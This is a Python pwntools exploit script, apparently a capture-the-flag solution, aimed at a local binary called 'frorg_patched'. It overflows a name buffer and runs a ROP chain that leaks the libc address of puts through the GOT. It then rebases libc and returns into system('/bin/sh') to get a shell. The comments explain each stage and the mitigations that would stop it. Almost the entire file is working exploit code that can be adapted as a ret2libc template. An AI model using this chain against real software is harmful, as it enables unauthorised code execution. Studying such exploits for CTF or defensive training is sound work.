from pwn import *
# Target binary and the libc whose symbols the leaked address is resolved
# against. Assigning context.binary also sets context.arch/bits, so p64/u64
# below pack for the target rather than the host.
context.binary = ELF("./frorg_patched")
elf = context.binary
libc = ELF("./libc.so.6")
r = elf.process()
# Debugging aid only: attaches gdb with a breakpoint at a fixed offset into
# main for this build. Remove it when the script runs unattended.
gdb.attach(r, gdbscript="b*main+165")
def send_data(data):
    """Answer the next ``name:`` prompt on the process ``r`` with ``data``.

    ``sendlineafter`` appends the newline the target reads up to, so callers
    pass the raw name (filler or payload) without a trailing ``\\n``.
    """
    prompt = b"name:"
    r.sendlineafter(prompt, data)
# Reserve 9 slots, then burn the first five with throwaway names; the
# overflowing payload goes in as the sixth entry further down.
r.sendlineafter(b"How many frorgies you want to store?", "9")
for count in range(5):
    send_data("1")
    print(f"Send name {count} time")
# ROP gadgets at fixed addresses (the binary is presumably built without PIE,
# since no base is added to elf.sym/elf.got — confirm with checksec):
# `pop rdi; ret`, and the bare `ret` one byte into the same gadget.
pop_rdi = 0x4011e5
ret = pop_rdi + 1

# Stage 1: leak a libc address. The sixth name overruns its buffer; 6 bytes
# of padding reach the saved return address (offset taken as given from the
# original payload; the absence of a canary is implied, not shown here), then
# puts(GOT[puts]) prints the resolved address and main is re-entered so the
# same overflow can be used once more. A length check on the name, or PIE
# plus a stack protector, would each break this chain.
padding = b"a" * 6
leak_chain = b"".join([
    padding,
    p64(pop_rdi),
    p64(elf.got["puts"]),
    p64(elf.plt["puts"]),
    p64(elf.sym["main"]),
])
send_data(leak_chain)
r.recvuntil(b"Thank you!\n")
# puts stops at the first NUL, so a little-endian 64-bit pointer comes back
# as (at most) 6 significant bytes; pad to 8 before unpacking.
raw = r.recv(6)
puts_leak = u64(raw.ljust(8, b"\0"))
log.success(f"Puts leak: {hex(puts_leak)}")
libc.address = puts_leak - libc.sym["puts"]
log.success(f"LIBC address: {hex(libc.address)}")
# Stage 2: repeat the same overflow now that libc is rebased, returning into
# system("/bin/sh"). The leading `ret` is presumably there to keep the stack
# 16-byte aligned on entry to system() — confirm if the call faults without it.
r.sendlineafter(b"How many frorgies you want to store?", "9")
for count in range(5):
    send_data("1")
    print(f"Send name {count} time")
binsh = next(libc.search(b"/bin/sh"))
shell_chain = b"".join([
    b"a" * 6,
    p64(ret),
    p64(pop_rdi),
    p64(binsh),
    p64(libc.sym["system"]),
])
send_data(shell_chain)
r.interactive()